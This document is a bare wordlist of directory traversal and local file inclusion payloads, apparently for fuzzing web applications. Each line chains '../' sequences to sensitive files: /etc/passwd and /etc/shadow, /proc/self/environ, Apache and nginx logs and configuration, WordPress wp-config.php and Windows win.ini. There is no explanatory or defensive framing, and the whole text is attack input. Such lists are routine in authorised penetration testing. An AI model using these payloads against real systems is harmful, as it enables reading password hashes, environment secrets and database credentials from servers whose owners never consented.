../../../../../../../../../../etc/passwd
../../../../../../../../../../windows/win.ini
/etc/passwd
C:\windows\win.ini
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../../proc/version
../../../../../../../../../../../proc/net/tcp
../../../../../../../../../../../proc/self/fd/0
../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../../var/www/html/index.php
../../../../../../../../../../../var/www/index.php
../../../../../../../../../../../var/www/html/wp-config.php
../../../../../../../../../../../var/www/wp-config.php
../../../../../../../../../../../usr/local/etc/apache2/httpd.conf
../../../../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../../../../etc/apache2/sites-available/000-default.conf
../../../../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../../../../etc/nginx/sites-available/default